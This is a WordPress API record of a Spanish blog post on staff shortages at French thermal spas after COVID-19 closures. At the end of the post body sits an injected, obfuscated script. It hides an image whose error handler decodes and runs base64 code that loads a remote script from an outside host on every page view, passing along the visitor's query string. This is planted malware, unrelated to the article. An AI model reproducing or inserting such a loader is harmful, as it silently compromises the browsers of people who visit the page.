{"id":4727,"date":"2021-09-28T09:15:48","date_gmt":"2021-09-28T12:15:48","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=4727"},"modified":"2025-08-13T16:27:19","modified_gmt":"2025-08-13T19:27:19","slug":"escasez-de-agentes-termicos-que-impacto-tienen-en-los-curados-termicos","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=4727","title":{"rendered":"Escasez de agentes t\u00e9rmicos: \u00bfqu\u00e9 impacto tienen en los curados t\u00e9rmicos? Termas en Francia&#8230;"},"content":{"rendered":"\n<h3 class=\"wp-block-heading\"><strong>Te habr\u00e1s dado cuenta: algunos de los centros termales sufren de falta de personal para esta temporada termal. \u00bfC\u00f3mo se puede explicar esto? \u00bfCu\u00e1l es el impacto en los curados t\u00e9rmicos? Te lo contamos todo.<\/strong><\/h3>\n\n\n\n<p>Desde el inicio de la crisis sanitaria relacionada con la&nbsp;<strong>COVID-19,<\/strong>los termas franceses se han enfrentado a un gran n\u00famero de complicaciones: cierres administrativos, aplazamientos de curaciones,&nbsp;medidas sanitarias a aplicar, medidores a respetar, etc. Tantos puntos que no facilitaron el curso de las curas t\u00e9rmicas.<\/p>\n\n\n\n<p>A pesar de todo, los curistas han estado y siguen estando en la cita para llevar a cabo su curaci\u00f3n t\u00e9rmica anual,&nbsp;<a href=\"https:\/\/www.officiel-thermalisme.com\/2021\/06\/15\/covid-19-comment-le-personnel-est-forme-pour-garantir-votre-securite-sanitaire-durant-votre-cure-thermale\/\" target=\"_blank\" rel=\"noreferrer noopener\">el personal de los centros les acoge en las mejores condiciones posibles<\/a>&nbsp;para facilitar su estancia t\u00e9rmica.<\/p>\n\n\n\n<p>Este a\u00f1o, sin embargo, a diferencia del a\u00f1o pasado, algunos ba\u00f1os termales tienen que hacer frente a una nueva dificultad: la&nbsp;<strong>falta de agentes termales para el periodo oto\u00f1al.<\/strong>&nbsp;De hecho, como cada a\u00f1o, la temporada termal es particularmente fuerte de septiembre a noviembre. Muchos hu\u00e9spedes del spa comienzan su tratamiento de spa en esta \u00e9poca y este a\u00f1o, en algunos establecimientos, no habr\u00e1 suficiente personal termal para acomodarlos.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/i1.wp.com\/www.officiel-thermalisme.com\/wp-content\/uploads\/2021\/09\/ODTWEB2109-peignoirs.jpg?w=1000&amp;ssl=1\" alt=\"\" \/><\/figure>\n\n\n\n<h3 class=\"has-vivid-green-cyan-color has-text-color wp-block-heading\"><strong>\u00bfCu\u00e1l es la raz\u00f3n<\/strong>&nbsp;de la falta de agentes en los<strong>&nbsp;centros termales?<\/strong><\/h3>\n\n\n\n<p>La situaci\u00f3n sanitaria tal y como la conocemos desde hace m\u00e1s de un a\u00f1o oblig\u00f3&nbsp;<a href=\"https:\/\/www.officiel-thermalisme.com\/2021\/04\/20\/cure-thermale-et-covid-une-reouverture-des-etablissements-thermaux-a-quelle-date-et-comment\/\" target=\"_blank\" rel=\"noreferrer noopener\">a los establecimientos termales a cerrar sus puertas de marzo a junio de 2020, luego de octubre de 2020 a mayo de 2021.<\/a>&nbsp;Un cierre que habr\u00e1 obligado a la direcci\u00f3n de los ba\u00f1os termales a poner a sus empleados en trabajos a jornada corta. Como resultado,&nbsp;<strong>muchos de ellos han encontrado trabajo en otros lugares para no caer en la precariedad.<\/strong>&nbsp;Tantos agentes termales o especialistas que no volver\u00e1n a practicar en los ba\u00f1os termales.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><strong><span style=\"color:#00d084\" class=\"tadv-color\">\u00bfC\u00f3mo reaccionan los ba\u00f1os termales ante esta falta de personal?<\/span><\/strong><\/h3>\n\n\n\n<p>Los centros termales afectados por esta falta de personal est\u00e1n haciendo todo lo posible para contar con la mano de obra necesaria para dar cabida a los curistas seg\u00fan lo previsto. As\u00ed,&nbsp;<strong>los establecimientos termales distribuyen masivamente ofertas de trabajo para reclutar lo m\u00e1s r\u00e1pido posible.<\/strong>&nbsp;La ventaja es que la formaci\u00f3n del personal se realiza directamente en obra, en los ba\u00f1os termales. No se requieren requisitos previos para aplicar.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/i0.wp.com\/www.officiel-thermalisme.com\/wp-content\/uploads\/2021\/09\/ODT2109-formation-personnel.jpg?w=1000&amp;ssl=1\" alt=\"\" \/><\/figure>\n\n\n\n<p>Se ha planteado la posibilidad de aumentar los salarios para atraer candidatos pero lamentablemente no es factible, como explica el delegado general del&nbsp;<strong>Consejo Nacional de Establecimientos Termales (Cneth), Claude-Eug\u00e8ne Bouvier,<\/strong> en una entrevista con Europe&nbsp;<a rel=\"noreferrer noopener\" href=\"https:\/\/www.europe1.fr\/economie\/face-a-la-penurie-de-main-doeuvre-les-patrons-frileux-a-lidee-daugmenter-les-salaires-4064019\" target=\"_blank\">1:<\/a>&nbsp;<em>\u00abLos establecimientos termales ya han sufrido grandes p\u00e9rdidas,&nbsp;<strong>una ca\u00edda muy significativa de la asistencia de alrededor del 60% en 2020.<\/strong>&nbsp;Realmente no tenemos ning\u00fan margen de maniobra para poder aumentar significativamente el nivel de remuneraci\u00f3n\u00bb.<\/em><\/p>\n\n\n\n<h3 class=\"has-vivid-green-cyan-color has-text-color wp-block-heading\"><strong>\u00bfQu\u00e9 impacto tienen los curados t\u00e9rmicos?<\/strong><\/h3>\n\n\n\n<p>Desafortunadamente, algunos ba\u00f1os termales no reciben el n\u00famero esperado de candidatos y se ven teniendo que&nbsp;<strong>posponer las curas termales<\/strong>&nbsp;de algunos curistas que han reservado para las pr\u00f3ximas semanas. Los primeros contactados para solicitar un aplazamiento del tratamiento son los residentes del&nbsp;<strong>spa en o cerca del spa en cuesti\u00f3n,<\/strong>que no hab\u00edan planeado alojamiento en el lugar.<\/p>\n\n\n\n<p>A trav\u00e9s de esta decisi\u00f3n, el objetivo es<strong>impactar lo menos posible en el tejido econ\u00f3mico del resort.<\/strong>&nbsp;De hecho, solicitar el aplazamiento de las curas de varios curistas penaliza no solo a los ba\u00f1os termales, sino tambi\u00e9n a los anfitriones, restauradores y tiendas del spa en cuesti\u00f3n.<\/p>\n\n\n\n<p>Los centros termales contin\u00faan intensamente su b\u00fasqueda de personal para&nbsp;<strong>limitar en la medida de lo posible el aplazamiento del tratamiento<\/strong>&nbsp;y acoger a los curistas seg\u00fan lo previsto.<\/p>\n\n\n\n<p class=\"has-light-green-cyan-color has-text-color\">Por mas informaci\u00f3n haga click abajo:<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"alignleft size-large\"><a href=\"https:\/\/www.officiel-thermalisme.com\/2021\/09\/21\/penurie-dagents-thermaux-quel-impact-sur-les-cures-thermales\/?utm_source=Officiel+du+Thermalisme&amp;utm_campaign=e8eb529528-EMAIL_CAMPAIGN_2021_09_10_07_14_COPY_01&amp;utm_medium=email&amp;utm_term=0_4a2750a4c7-e8eb529528-1357231813\" target=\"_blank\" rel=\"noopener\"><img decoding=\"async\" width=\"500\" height=\"143\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/09\/Termas.jpg\" alt=\"\" class=\"wp-image-4728\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/09\/Termas.jpg 500w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/09\/Termas-300x86.jpg 300w\" sizes=\"(max-width: 500px) 100vw, 500px\" \/><\/a><figcaption>Fuente:<\/figcaption><\/figure><\/div>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Te habr\u00e1s dado cuenta: algunos de los centros termales sufren de falta de personal para esta temporada termal. \u00bfC\u00f3mo se puede explicar esto? \u00bfCu\u00e1l es el impacto en los curados t\u00e9rmicos? Te lo contamos todo. Desde el inicio de la crisis sanitaria relacionada con la&nbsp;COVID-19,los termas franceses se han enfrentado a un gran n\u00famero de [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":4729,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[28],"tags":[],"class_list":["post-4727","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-portales-de-servicios-e-informacion"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4727","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4727"}],"version-history":[{"count":3,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4727\/revisions"}],"predecessor-version":[{"id":10771,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4727\/revisions\/10771"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4729"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4727"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4727"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4727"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}